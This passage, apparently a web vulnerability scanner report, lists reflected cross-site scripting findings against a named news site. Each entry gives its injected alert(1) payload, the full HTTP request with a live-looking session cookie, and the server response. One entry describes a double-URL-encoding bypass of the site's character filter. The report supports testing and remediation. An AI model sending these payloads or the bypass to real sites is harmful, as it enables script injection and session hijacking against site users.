Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:39:16 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70184
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68e9c'%3balert(1)//85074386e76 was submitted in the REST URL parameter 5. This input was echoed as 68e9c';alert(1)//85074386e76 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronx/2011/02/0868e9c'%3balert(1)//85074386e76/2011-02-08_budget_cuts_threaten_grandparent_family_apartments_sending_kids_back_to_life_on_.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:40:03 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70184
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 986e4'%3balert(1)//65be1d34d1b was submitted in the REST URL parameter 6. This input was echoed as 986e4';alert(1)//65be1d34d1b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronx/2011/02/08/2011-02-08_budget_cuts_threaten_grandparent_family_apartments_sending_kids_back_to_life_on_.html986e4'%3balert(1)//65be1d34d1b HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:41:04 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70184
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d697'%3balert(1)//f0c6371d739 was submitted in the REST URL parameter 1. This input was echoed as 1d697';alert(1)//f0c6371d739 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local1d697'%3balert(1)//f0c6371d739/bronx/2011/02/08/2011-02-08_parents_teachers_students_worry_about_fallout_from_more_than_20_closed_schools.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:37:02 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70182
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40ff1'%3balert(1)//cf61dfa48aa was submitted in the REST URL parameter 2. This input was echoed as 40ff1';alert(1)//cf61dfa48aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronx40ff1'%3balert(1)//cf61dfa48aa/2011/02/08/2011-02-08_parents_teachers_students_worry_about_fallout_from_more_than_20_closed_schools.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:37:23 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70182
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f8ee'%3balert(1)//86d04fde49a was submitted in the REST URL parameter 3. This input was echoed as 4f8ee';alert(1)//86d04fde49a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronx/20114f8ee'%3balert(1)//86d04fde49a/02/08/2011-02-08_parents_teachers_students_worry_about_fallout_from_more_than_20_closed_schools.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:38:15 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70182
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f8e1'%3balert(1)//48ba0a85a24 was submitted in the REST URL parameter 4. This input was echoed as 7f8e1';alert(1)//48ba0a85a24 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronx/2011/027f8e1'%3balert(1)//48ba0a85a24/08/2011-02-08_parents_teachers_students_worry_about_fallout_from_more_than_20_closed_schools.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:39:21 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70182
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e436'%3balert(1)//4d5ff5c698 was submitted in the REST URL parameter 5. This input was echoed as 9e436';alert(1)//4d5ff5c698 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronx/2011/02/089e436'%3balert(1)//4d5ff5c698/2011-02-08_parents_teachers_students_worry_about_fallout_from_more_than_20_closed_schools.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:40:09 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70181
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cebfe'%3balert(1)//645dba93430 was submitted in the REST URL parameter 6. This input was echoed as cebfe';alert(1)//645dba93430 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronx/2011/02/08/2011-02-08_parents_teachers_students_worry_about_fallout_from_more_than_20_closed_schools.htmlcebfe'%3balert(1)//645dba93430 HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:41:00 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70182
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8788d'%3balert(1)//766c52f71a8 was submitted in the REST URL parameter 1. This input was echoed as 8788d';alert(1)//766c52f71a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local8788d'%3balert(1)//766c52f71a8/bronx/index.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:36:30 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70087
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6bd6c'%3balert(1)//6328faa9069 was submitted in the REST URL parameter 2. This input was echoed as 6bd6c';alert(1)//6328faa9069 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronx6bd6c'%3balert(1)//6328faa9069/index.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:36:47 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70087
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7bb6'%3balert(1)//c5a17b8b63a was submitted in the REST URL parameter 3. This input was echoed as c7bb6';alert(1)//c5a17b8b63a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/bronx/index.htmlc7bb6'%3balert(1)//c5a17b8b63a HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found
Date: Tue, 08 Feb 2011 18:37:09 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 70087
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42da1'%3balert(1)//eccd8216a4d was submitted in the REST URL parameter 1. This input was echoed as 42da1';alert(1)//eccd8216a4d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local42da1'%3balert(1)//eccd8216a4d/bronx/photo_galleries/index.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 18:37:12 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 41778
Age: 0
Via: AX-CACHE-2.4:20
The value of REST URL parameter 1 is copied into a JavaScript rest-of-line comment. The payload 52670%250aalert%25281%2529%252f%252faa429ee7bb4 was submitted in the REST URL parameter 1. This input was echoed as 52670 alert(1)//aa429ee7bb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /ny_local52670%250aalert%25281%2529%252f%252faa429ee7bb4/bronx/photo_galleries/index.html HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 18:37:14 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Content-Length: 41694
Age: 0
Via: AX-CACHE-2.4:20
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b91e'%3balert(1)//0d3eac7e4b7 was submitted in the REST URL parameter 2. This input was echoed as 8b91e';alert(1)//0d3eac7e4b7 in the application's response.
